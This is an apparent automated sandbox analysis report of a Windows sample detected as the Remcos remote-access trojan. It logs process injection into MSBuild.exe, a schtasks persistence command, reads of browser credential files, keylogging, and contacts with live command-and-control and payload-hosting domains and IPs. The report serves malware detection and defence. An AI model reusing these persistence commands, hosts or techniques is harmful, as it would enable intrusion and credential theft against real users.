                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /fJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "WidgetData" /tr "C:\Users\user\AppData\Roaming\Lamsses.exe " /sc minute /mo 5 /fJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager85\11h
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4670639752.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager85\
                  Source: MSBuild.exe, 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerE
                  Source: MSBuild.exe, 00000004.00000002.4670639752.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager85\>
                  Source: MSBuild.exe, 00000004.00000002.4670639752.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerX
                  Source: MSBuild.exe, 00000004.00000002.4670639752.000000000142B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager4
                  Source: MSBuild.exe, 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000004.00000002.4670639752.0000000001438000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: MSBuild.exe, 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00434C52 cpuid 9_2_00434C52
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,9_2_00452036
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_004520C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,9_2_00452313
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,9_2_00448404
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_0045243C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,9_2_00452543
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00452610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,9_2_0040F8D1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,9_2_004488ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_00451CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,9_2_00451F50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,9_2_00451F9B
                  Source: C:\Users\user\Desktop\41DLTjkmOm.exeQueries volume information: C:\Users\user\Desktop\41DLTjkmOm.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Lamsses.exeQueries volume information: C:\Users\user\AppData\Roaming\Lamsses.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0040B164 GetLocalTime,wsprintfW,9_2_0040B164
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_0041B60D GetUserNameW,9_2_0041B60D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 9_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,9_2_00449190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data9_2_0040BA12
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\9_2_0040BB30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db9_2_0040BB30

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-SIVP85Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-SIVP85Jump to behavior
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.1319b3d8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.41DLTjkmOm.exe.131227a0.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670994702.0000000002F6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253404142.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4670639752.00000000013D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 41DLTjkmOm.exe PID: 516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3984, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6272, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe9_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  12
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Bypass User Account Control
                  1
                  Deobfuscate/Decode Files or Information
                  211
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol211
                  Input Capture
                  21
                  Encrypted Channel
                  Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  1
                  Access Token Manipulation
                  2
                  Obfuscated Files or Information
                  2
                  Credentials In Files
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  Software Packing
                  NTDS2
                  File and Directory Discovery
                  Distributed Component Object ModelInput Capture1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script322
                  Process Injection
                  1
                  DLL Side-Loading
                  LSA Secrets33
                  System Information Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Scheduled Task/Job
                  1
                  Bypass User Account Control
                  Cached Domain Credentials121
                  Security Software Discovery
                  VNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync31
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                  Virtualization/Sandbox Evasion
                  Proc Filesystem3
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron322
                  Process Injection
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483415 Sample: 41DLTjkmOm.exe Startdate: 27/07/2024 Architecture: WINDOWS Score: 100 38 geoplugin.net 2->38 40 bignight.net 2->40 42 4 other IPs or domains 2->42 50 Multi AV Scanner detection for domain / URL 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 8 other signatures 2->56 8 41DLTjkmOm.exe 17 2->8         started        13 Lamsses.exe 13 2->13         started        signatures3 process4 dnsIp5 48 investdirectinsurance.com 172.67.189.102, 443, 49714, 49715 CLOUDFLARENETUS United States 8->48 32 C:\Users\user\AppData\Roaming\Lamsses.exe, PE32 8->32 dropped 34 C:\Users\user\...\Lamsses.exe:Zone.Identifier, ASCII 8->34 dropped 36 C:\Users\user\AppData\...\41DLTjkmOm.exe.log, CSV 8->36 dropped 58 Writes to foreign memory regions 8->58 60 Allocates memory in foreign processes 8->60 62 Injects a PE file into a foreign processes 8->62 15 MSBuild.exe 8->15         started        18 MSBuild.exe 3 15 8->18         started        22 cmd.exe 1 8->22         started        64 Multi AV Scanner detection for dropped file 13->64 24 MSBuild.exe 13->24         started        file6 signatures7 process8 dnsIp9 66 Contains functionality to bypass UAC (CMSTPLUA) 15->66 68 Contains functionalty to change the wallpaper 15->68 70 Contains functionality to steal Chrome passwords or cookies 15->70 78 3 other signatures 15->78 44 bignight.net 146.70.57.34, 3363, 49716, 49717 TENET-1ZA United Kingdom 18->44 46 geoplugin.net 178.237.33.50, 49718, 80 ATOM86-ASATOM86NL Netherlands 18->46 30 C:\ProgramData\remcos\logs.dat, data 18->30 dropped 72 Detected Remcos RAT 18->72 74 Installs a global keyboard hook 18->74 76 Uses schtasks.exe or at.exe to add and modify task schedules 22->76 26 conhost.exe 22->26         started        28 schtasks.exe 1 22->28         started        file10 signatures11 process12

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  41DLTjkmOm.exe23%VirustotalBrowse
                  41DLTjkmOm.exe42%ReversingLabsWin32.Backdoor.Remcos
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Lamsses.exe42%ReversingLabsWin32.Backdoor.Remcos
                  C:\Users\user\AppData\Roaming\Lamsses.exe23%VirustotalBrowse
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  bg.microsoft.map.fastly.net0%VirustotalBrowse
                  bignight.net10%VirustotalBrowse
                  geoplugin.net1%VirustotalBrowse
                  fp2e7a.wpc.phicdn.net0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  bignight.net0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytyp0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/Paatapas.ytyp0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypim)_0%Avira URL Cloudsafe
                  http://geoplugin.net/jso0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypcm#_0%Avira URL Cloudsafe
                  bignight.net10%VirustotalBrowse
                  http://geoplugin.net/json.gp?0%Avira URL Cloudsafe
                  https://investdirectinsurance.com/1%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytyp1%VirustotalBrowse
                  http://geoplugin.net/json.gp?2%VirustotalBrowse
                  https://investdirectinsurance.com/assuence/litesolidCha/Paatapas.ytyp1%VirustotalBrowse
                  http://geoplugin.net/jso0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalseunknown
                  bignight.net
                  146.70.57.34
                  truetrueunknown
                  geoplugin.net
                  178.237.33.50
                  truetrueunknown
                  investdirectinsurance.com
                  172.67.189.102
                  truefalse
                    unknown
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalseunknown
                    NameMaliciousAntivirus DetectionReputation
                    http://geoplugin.net/json.gptrue
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    bignight.nettrue
                    • 10%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/Paatapas.ytypfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypim)_41DLTjkmOm.exe, 00000000.00000002.2246234093.0000000001364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://investdirectinsurance.com/41DLTjkmOm.exe, 00000000.00000002.2248655300.000000001BEE8000.00000004.00000020.00020000.00000000.sdmp, 41DLTjkmOm.exe, 00000000.00000002.2246234093.00000000013C6000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gp/C41DLTjkmOm.exe, 00000000.00000002.2247441710.00000000130A9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2253134248.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://investdirectinsurance.com/assuence/litesolidCha/MangoDB.ytypcm#_41DLTjkmOm.exe, 00000000.00000002.2246234093.0000000001364000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/jsoMSBuild.exe, 00000004.00000002.4670639752.0000000001438000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 0%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://geoplugin.net/json.gp?MSBuild.exe, 00000004.00000002.4670639752.0000000001416000.00000004.00000020.00020000.00000000.sdmpfalse
                    • 2%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.189.102
                    investdirectinsurance.comUnited States
                    13335CLOUDFLARENETUSfalse
                    178.237.33.50
                    geoplugin.netNetherlands
                    8455ATOM86-ASATOM86NLtrue
                    146.70.57.34
                    bignight.netUnited Kingdom
                    2018TENET-1ZAtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1483415
                    Start date and time:2024-07-27 11:36:08 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 49s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:12
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:41DLTjkmOm.exe
                    renamed because original name is a hash value
                    Original Sample Name:37c8afc687419dfc68e7f63c28c0cbbc11ca34cfd32b095711f7a8818788931f.exe
                    Detection:MAL
                    Classification:mal100.rans.troj.spyw.expl.evad.winEXE@13/8@3/3
                    EGA Information:
                    • Successful, ratio: 75%
                    HCA Information:
                    • Successful, ratio: 98%
                    • Number of executed functions: 27
                    • Number of non-executed functions: 210
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 40.113.103.199, 52.165.165.26, 192.229.221.95, 52.165.164.15, 199.232.210.172, 20.166.126.56, 199.232.214.172
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                    • Execution Graph export aborted for target MSBuild.exe, PID 3984 because there are no executed function
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    05:37:44API Interceptor7930939x Sleep call for process: MSBuild.exe modified
                    11:37:13Task SchedulerRun new task: WidgetData path: C:\Users\user\AppData\Roaming\Lamsses.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    178.237.33.50Shipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                    • geoplugin.net/json.gp
                    erthings.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    girlfrnd.docGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                    • geoplugin.net/json.gp
                    146.70.57.34Proof of Payment copy.exeGet hashmaliciousRemcosBrowse
                      REVISED NEW ORDER 7936-2024.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                        RFQ.NO. S70-23Q-1474-CS-P.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                          RFQ NO- S70-23Q-147400000789975DXT-CS-P-0730RDER.bat.exeGet hashmaliciousRemcosBrowse
                            Payment Invoice.exeGet hashmaliciousRemcosBrowse
                              RFQ.NO. S70-23Q-1474-CS-P - ORDER 2024.gz.exeGet hashmaliciousRemcosBrowse
                                NEW ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.bat.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                  ORDER RFQ ICPO TECNOMAT-JEAL-EN590-200KMT-RTDM+TSA.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                    SecuriteInfo.com.Win32.PWSX-gen.19953.22926.exeGet hashmaliciousRemcosBrowse
                                      SecuriteInfo.com.Win32.PWSX-gen.22684.1131.exeGet hashmaliciousRemcosBrowse
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        investdirectinsurance.comYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                        • 104.21.65.79
                                        SWIFT.exeGet hashmaliciousLokibotBrowse
                                        • 104.21.65.79
                                        SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                                        • 104.21.65.79
                                        bignight.netProof of Payment copy.exeGet hashmaliciousRemcosBrowse
                                        • 146.70.57.34
                                        Payment Invoice.exeGet hashmaliciousRemcosBrowse
                                        • 146.70.57.34
                                        bg.microsoft.map.fastly.netYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                        • 199.232.214.172
                                        oz9Blof9tN.msiGet hashmaliciousCobaltStrikeBrowse
                                        • 199.232.214.172
                                        QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 199.232.210.172
                                        invoker.ps1Get hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 199.232.214.172
                                        http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                                        • 199.232.214.172
                                        http://apple.dogwog.com/Get hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        https://phhqqzqh7ydp8nreby0mq5yfr8su0h93.ocalam.com:8443/impact?impact=shanmugasundaramGet hashmaliciousHTMLPhisherBrowse
                                        • 199.232.214.172
                                        http://apple.fnf478.com/Get hashmaliciousUnknownBrowse
                                        • 199.232.210.172
                                        fp2e7a.wpc.phicdn.netYcj3d5NMhc.exeGet hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        QUOTATION_JULQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        • 192.229.221.95
                                        https://azadengg.com/MTQwOTk4NzcwMg==sfmaxWjJWdUxYQm5lQzA0TXpVMU1EZ3dNMmxtZUdOb1lYWmxlbkpwYzNoaGFYSmliM0p1TG1OdmJRPT0=&c=E,1,LZxP3HHb1f9qSYvI9qirqXkUUBAc_Lly3K7xLwNdfYOBECyaKUoAd-t3gcHqWT79cExKeBU56i8wGFRIGcXn5xtHq6aoS1GJuvxV76lYjLuWHw,,&typo=1Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        x.ps1Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        invoker.ps1Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        http://investors.spotify.com.th.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        http://investors.spotify.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        http://cache.netflix.com.sg3.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        http://apple.vn377.com/Get hashmaliciousUnknownBrowse
                                        • 192.229.221.95
                                        geoplugin.netShipping documents PO 16103 INV.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        172200150645e30715396b41ed298fc2fc05d94f3a962536daa72f2c5d72e7d784323a4055802.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        1722001145c8336cb6887f0bbe0b12744f5c43638979603a57a5fc96eb7f34015fb312b4f7920.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        girlfrnd.docGet hashmaliciousGuLoader, RemcosBrowse
                                        • 178.237.33.50
                                        erthings.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        girlfrnd.docGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        UD61dgs2rz.exeGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                                        • 178.237.33.50
                                        Purchase Inquiry.xla.xlsxGet hashmaliciousRemcosBrowse
